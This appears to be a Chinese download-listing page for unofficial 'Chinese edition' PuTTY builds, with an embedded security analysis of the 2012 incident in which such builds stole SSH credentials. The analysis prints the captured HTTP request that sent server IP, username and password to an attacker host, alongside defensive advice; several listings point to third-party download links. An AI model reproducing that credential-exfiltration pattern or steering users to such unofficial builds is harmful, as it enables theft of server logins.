-
2019-09-23 19:34:33
这是一款小巧的Linux服务器上传工具,无需安装,主要应用于网站开发(至少我是经常这样用的,其他的没试过)。可以整个文件夹获单个文件上传,速度很快。也可以枚举并查看Linux服务器资源。
功能介绍Putty是一个免费的、Windows 32平台下的telnet、rlogin和ssh客户端,但是功能丝毫不逊色于商业的telnet类工具。用它来远程管理Linux十分好用,其主要优点如下: 在Windows 9x/NT/2000下运行的都非常好; 全面支持ssh1和ssh2;
下载地址1:https://www.lanzous.com/i6crx7a
下载地址2:https://pan.baidu.com/s/1QdV83YjdQBLwhDbHJ4Usmg 提取码: jhv1
更多相关内容 -
putty.zip PuTTY中文版
2019-06-03 17:32:45PuTTY中文版是一款免费的远程登录工具,相比于其他同类软件,PuTTY中文版,本款软件轻盈小巧、无需安装,操作简单易上手,非常适合用来远程管理Linux。主要用于远程控制桌面,比如连接树莓派界面。 -
PuTTY_doc:PuTTY Document in Chinese.简体中文版PuTTY文档
2021-04-27 13:22:19PuTTY_doc PuTTY Document in Chinese.简体中文版PuTTY文档 -
putty中文版.zip
2020-04-05 21:05:23putty0.70中文版32位64位远程登录客户端/终端;PuTTY是一个Telnet、SSH、rlogin、纯TCP以及串行接口连接软件;随着Linux在服务器端应用的普及,Linux系统管理越来越依赖于远程。在各种远程登录工具中,Putty是出色的... -
中文版putty后门事件分析
2019-12-02 16:00:20近几日,中文版putty等SSH远程管理工具被曝出存在后门,该后门会自动 窃取管理员所输入的SSH用户名与口令,并将其发送至指定服务器上。知道创宇安全研究小组在第一时间获取该消息后,对此次事件进行了跟踪和分析。...2012年02月01日 17:45
感谢lszm的投递
近几日,中文版putty等SSH远程管理工具被曝出存在后门,该后门会自动 窃取管理员所输入的SSH用户名与口令,并将其发送至指定服务器上。知道创宇安全研究小组在第一时间获取该消息后,对此次事件进行了跟踪和分析。根据分 析,此次事件涉及到来自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站点的中文版putty、 WinSCP、SSHSecure和psftp等软件,而这些软件的英文版本不受影响。1.时间线
1月25日:新浪微博有网友发布消息称putty和winscp中装有后门程序,但该条微博并未提及后门程序的类型及其技术细节,而且消息也未被过多的人所重视,目前无法确定该条微博是否与此次事件有关联:
1月30日下午16点左右:互联网上再度出现关于中文版putty等SSH管理软件被装有后门的消息,并且此消息对后门的行为特征进行了简要的描述 —— 该程序会导致root密码丢失,但发布者仍未披露具体的技术细节:
以上微博的短URL所对应的文章截图如下:
1月31日:经过一晚的酝酿,putty事件开始在互联网上广泛传播,微博、论坛等信息发布平台上开始大量出现putty后门事件的消息,同时,很多技术人员也开始对含有后门的putty等SSH管理软件进行技术分析,并陆续发布其中的技术细节。
2.事件分析
2.1问题软件源头
知道创宇安全研究团队在获取信息后,第一时间对putty等软件进行了跟踪分析。通过分析发现,来自以下几个站点的中文版putty、WinSCP、SSHSecure和psftp等软件都可能存在后门程序:
http://www.putty.org.cn
http://www.putty.ws
http://www.winscp.cc
http://www.sshsecure.com2.2行为分析
2.2.1网络行为分析
使用带有后门程序的中文版putty等SSH管理软件连接服务器时,程序会自动记录登录时的用户名、密码和服务器IP地址等信息,并会以HTTP的方式将这些信息发送到指定的服务器上,以下是在分析过程中抓取到的原始HTTP数据:
GET /yj33/js2.asp?act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Host: l.ip-163.com:88
Pragma: no-cache从以上数据可以获得以下信息:
- 敏感信息通过HTTP GET的方式发送到服务器l.ip-163.com上(经测试,该域名与putty.org.cn位于同一IP地址上)
- 用于收集密码的程序地址为http:// l.ip-163.com:88/yj33/js2.asp
- 敏感信息以GET参数的方式发送到服务器上,相关参数为:
act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY
每个字段的作用如下:
- act为执行的动作,参数add用于添加信息,经测试,也可使用del来删除信息
- user为SSH服务器的IP地址,此处为50.23.79.188
- pwd为连接服务器时的登录用户名,此处为abc
- ll1为登录密码,此处为pass
- ll2为目标服务器的SSH端口,此处为22(即,默认端口)
- ll3则为客户端类型,此处为PuTTY
2.2.2服务器本地文件分析
知道创宇安全研究团队借助文件完整性校验的方式,对服务器初始安全状态下的 /etc、/lib、/usr、/bin等敏感目录进行了完整性备份,并在putty连接测试后对这些目录的文件变更、丢失和添加等情况进行了校验,校验 结果显示,中文版putty并未对服务器自动安装后门程序。
网络上部分消息称,有些使用中文版putty进行过远程管理的服务器上出现恶意代码和文件,可能是由于恶意用户获取了putty所收集的密码后人为植入所致。
2.3事件后续
截止至2月1日,在本次事件中所涉及的以下域名均已不能访问:
http://www.putty.org.cn
http://putty.ws
http://www.winscp.cc
http://www.sshsecure.com
http://l.ip-163.com:88
但是,在1月31日晚,网络上传出“l.ip-163.com被黑”的消息并配有一张“受害者列表”的截图:
而就在此消息发布不久之后,互联网上便出现了完整的受害者列表供所有用户浏览和下载,根据这份来自互联网列表的显示,不但有众多政府网站位列其中,IBM、Oracle、HP等大厂商的服务器也出现在列表内。
3.安全建议
若您使用过中文版的putty、WinSCP、SSHSecure和psftp等软件,但暂时又不能对服务器进行下线处理,可采取以下临时解决方案来处理:
- 使用chkrootkit或rootkit hunter对服务器进行扫描,检查是否存在已知后门
- 查看网络是否有可疑外联,并加强对可疑外联的监控
- 在网络层建立端口访问控制策略,阻止除正常业务外的一切非业务、非管理端口
- 更换SSH登录密码,建议登录时使用证书加密码的组合方式进行身份验证
- 登录SSH时,不要直接使用root用户,先使用普通用户登录后,再su至root
- 服务器端通过TCP Wrapper或iptables等软件,限制IP访问,仅允许特定IP地址对服务器的SSH进行连接和管理
- 如需使用putty、WinSCP等软件,可访问其官方站点下载:
http://winscp.net/eng/docs/lang:chs
-
putty中文版
2018-11-12 17:07:28Windows平台下的Telnet、SSH和rlogin客户端。有效的远程登录工具。 -
putty中文版putty中文版putty中文版
2008-09-09 15:21:10不用多说吧!putty中文版putty中文版putty中文版putty中文版putty中文版putty中文版putty中文版putty中文版putty中文版putty中文版putty中文版putty中文版putty中文版putty中文版 -
PuTTY 0.70 中文版
2017-11-05 12:23:38PuTTY 0.70 中文版 更新日志:2017-07-17 安全修复:Windows PuTTY二进制文件不再容易受到特定命名的DLL在同一个目录中的劫持; Windows PuTTY再次支持打印; Windows PuTTY接受当前代码页之外的键盘输入。 -
中文版 putty 保存密码,自动登录 ,配置保存在文件
2013-04-09 17:10:41基于putty0.62 功能修改: 1、中文版 2、保存密码,自动登录 3、配置保存在文件中 注意:密码明文保存 -
Putty中文版
2018-11-09 14:31:33软件特点: 1、所有内容都是中文显示,避免英文的影响。 2、不需要安装,不需要破解。 3、程序小巧。 -
putty0.61中文版putty中文版
2011-07-25 10:44:50putty中文版 linux远程客户端 -
中文版putty linux登陆工具
2012-01-03 21:49:49中文版putty linux登陆工具 -
中文版putty超级终端
2013-09-05 11:30:04中文版putty,方便远程登录管理交换机服务器 -
PuTTY中文版
2019-02-14 17:54:14软件特点: 1、所有内容都是中文显示,避免英文的影响。 2、不需要安装,不需要破解。 3、程序小巧。 -
PuTTY中文版.zip
2020-03-16 01:22:03PuTTY最强大中文版 -
PUTTY简体中文版
2018-08-16 13:06:47PUTTY简体中文版 ........PUTTY简体中文版.............PUTTY简体中文版 -
PUTTY中文版
2016-10-30 19:55:43PUTTY中文版 -
PUTTY 中文版
2015-07-28 16:28:48putty.exe PUTTY 中文版亲测可用 不错的宝贝! -
linux远程连接工具putty中文版
2018-07-24 11:23:52PuTTY是一套免费的SSH/Telnet程序,它可以连接上支持SSH Telnet联机的站台,并且可自动取得对方的系统指纹码(Fingerprint)。建立联机以后,所有的通讯内 -
putty_0.63cn3中文版.rar
2021-10-01 19:59:17用它来远程管理 Linux 十分好用,其主要优点如下: ◆ 完全免费 ◆ 在 Windows 9x/NT/2000 下运行的都非常好 ◆ 全面支持 SSH1 和 SSH2 ◆ 体积很小 ◆ 操作简单 -
putty中文版下载
2019-04-14 09:31:03PuTTY 是一套免费的 SSH / Telnet 程序,它可以连接上支持 SSH Telnet 联机的站台,并且可自动取得对方的系统指纹码 (Fingerprint)。建立联机以后,所有的通讯内容都是以加密的方式传输,因此你再也不用害怕使用 ... -
PuTTy v0.63中文版.zip
2019-07-11 11:30:53PuTTY 是一套免费的 SSH / Telnet 程序,它可以连接上支持 SSH Telnet 联机的站台,并且可自动取得对方的系统指纹码 -
putty教材中文版
2018-08-30 09:50:02PuTTY是一套免费的SSH/Telnet程序,它可以连接上支持SSH Telnet联机的站台,并且可自动取得对方的系统指纹码(Fingerprint)。建立联机以后,所有的通讯内容都是以加密的方式传输,因此你再也不用害怕使用Telnet在... -
putty-060-chs(简体中文版)
2020-05-21 20:48:26putty-060-chs(简体中文版) -
putty可保存密码版本
2018-05-24 15:00:34putty可保存密码和登录信息,轻巧灵便,可访问任意服务端 -
Putty 远程登录工具 v0.70中文版
2020-09-28 12:24:52Putty是一个免费的、Windows 32平台下的telnet、rlogin和ssh客户端,在各种远程登录工具中,Putty是出色的工具之一,Putty具有完全免费、小巧绿色、无需安装、操作简单等特点。其功能丝毫不逊色于商业的telnet类工具... -
putty和汉化版的SecureCRT
2019-03-03 20:39:16这是两个简单实用的小工具,可以用来连接远程的服务器。 -
putty跑码中文版-【来自麒麟网】.rar
2020-07-25 15:06:00Putty是一个免费的、Windows 32平台下的telnet、rlogin和ssh客户端,在各种远程登录工具中,Putty是出色的工具之一,Putty具有完全免费、小巧绿色、无需安装、操作简单等特点。其功能丝毫不逊色于商业的telnet类工具...